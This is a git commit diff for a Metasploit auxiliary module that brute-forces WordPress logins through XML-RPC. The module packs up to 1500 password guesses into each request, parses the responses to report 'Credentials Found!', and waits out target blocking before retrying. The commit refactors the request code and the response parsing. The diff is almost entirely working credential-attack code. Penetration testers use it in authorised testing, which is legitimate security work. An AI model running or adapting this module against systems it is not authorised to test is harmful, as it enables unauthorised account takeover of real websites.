Fix exceptions and XML parsing

2015-11-12 05:30:07 +03:00 · 2015-11-12 05:30:07 +03:00 · 2abfa1f241
parent b37fb3f34d
commit 2abfa1f241
1 changed files with 55 additions and 40 deletions
--- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
@ -46,11 +46,13 @@ class Metasploit3 < Msf::Auxiliary
    File.readlines(datastore['WPPASS_FILE']).map {|pass| pass.chomp}
  end

+  #
+  # XML Factory
+  #
  def generate_xml(user)

    vprint_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
    xml_payloads = []                          # Container for all generated XMLs
-
    # Evil XML | Limit number of log-ins to 1500/request for wordpress limitation
    passwords.each_slice(1500) do |pass_group|

@ -99,65 +101,78 @@ class Metasploit3 < Msf::Auxiliary
    print_status("Checking #{peer} status!")

    if !wordpress_and_online?
-      print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress or you got blocked!")
-      return
+      print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running Wordpress or you got blocked! (Do Manual Check)")
+      nil
    elsif !wordpress_xmlrpc_enabled?
-      print_error("#{rhost}:#{rport}#{target_uri} does not enable XMLRPC")
-      return
+      print_error("#{rhost}:#{rport}#{wordpress_url_xmlrpc} does not enable XMLRPC")
+      nil
    else
      print_status("Target #{peer} is running Wordpress")
+      true
    end
+
+  end
+
+  #
+  # Connection Setup
+  #
+  def connecting(xml)
+    uri = target_uri.path
+    opts =
+      {
+        'method'  => 'POST',
+        'uri'     => normalize_uri(uri, wordpress_url_xmlrpc),
+        'data'    => xml,
+        'ctype'   =>'text/xml'
+      }
+    client = Rex::Proto::Http::Client.new(rhost)
+    client.connect
+    request  = client.request_cgi(opts)
+    response = client.send_recv(request)
+
+    if response.code != 200
+      print_error('It seems you got blocked!')
+      print_warning("I'll sleep for #{datastore['BLOCKEDWAIT']} minutes, then I'll try again. CTR+C to exit")
+      sleep datastore['BLOCKEDWAIT'] * 60
+    end
+    @response = response
  end

  def run
-    check_wpstatus
+    return if check_wpstatus.nil?

    usernames.each do |user|
      passfound = false

      print_status("Bruteforcing user: #{user}")
      generate_xml(user).each do |xml|
-        break if passfound == true
+        next if passfound == true

-        uri = target_uri.path
-        opts =
-            {
-              'method'  => 'POST',
-              'uri'     => normalize_uri(uri, wordpress_url_xmlrpc),
-              'data'    => xml,
-              'ctype'   =>'text/xml'
-            }
-
-        client = Rex::Proto::Http::Client.new(rhost)
-        client.connect
-        request  = client.request_cgi(opts)
-        response = client.send_recv(request)
+        connecting(xml)

        # Request Parser
        req_xml = Nokogiri::Slop xml
        # Response Parser
-        res_xml = Nokogiri::Slop response.to_s.scan(/<.*>/).join
+        res_xml = Nokogiri::Slop @response.to_s.scan(/<.*>/).join

-        begin
-          res_xml.document.methodResponse.params.param.value.array.data.value.each_with_index do |value, i|
-            begin
-              # If this gives exception then its the correct password
-              value.struct.member[1].value.string.text
-            rescue
-              user = req_xml.document.methodCall.params.param.value.array.data.value[i].struct.member[1].value.array.data.value.array.data.value[0].text.strip
-              pass = req_xml.document.methodCall.params.param.value.array.data.value[i].struct.member[1].value.array.data.value.array.data.value[1].text.strip
+        res_xml.search("methodResponse/params/param/value/array/data/value").each_with_index do |value, i|
+
+          result =  value.at("struct/member/value/int")
+          # If response error code doesn't not exist
+          if result.nil?
+            user = req_xml.search("data/value/array/data")[i].value[0].text.strip
+            pass = req_xml.search("data/value/array/data")[i].value[1].text.strip
+            print_good("Credentials Found! #{user}:#{pass}")
+
+            passfound = true
+          end

-              print_good("Credentials Found! #{user}:#{pass}")
-              passfound = true
-            end end
-        rescue NoMethodError
-          print_error('It seems you got blocked!')
-          print_warning("I'll sleep for #{datastore['BLOCKEDWAIT']} minutes then I'll try again. CTR+C to exit")
-          sleep datastore['BLOCKEDWAIT'] * 60
-          retry
        end
-        vprint_status('Sleeping for 2 seconds..')
-        sleep 2
-      end end end

+        unless user == usernames.last
+          vprint_status('Sleeping for 2 seconds..')
+          sleep 2
+        end
+
+  end end end
 end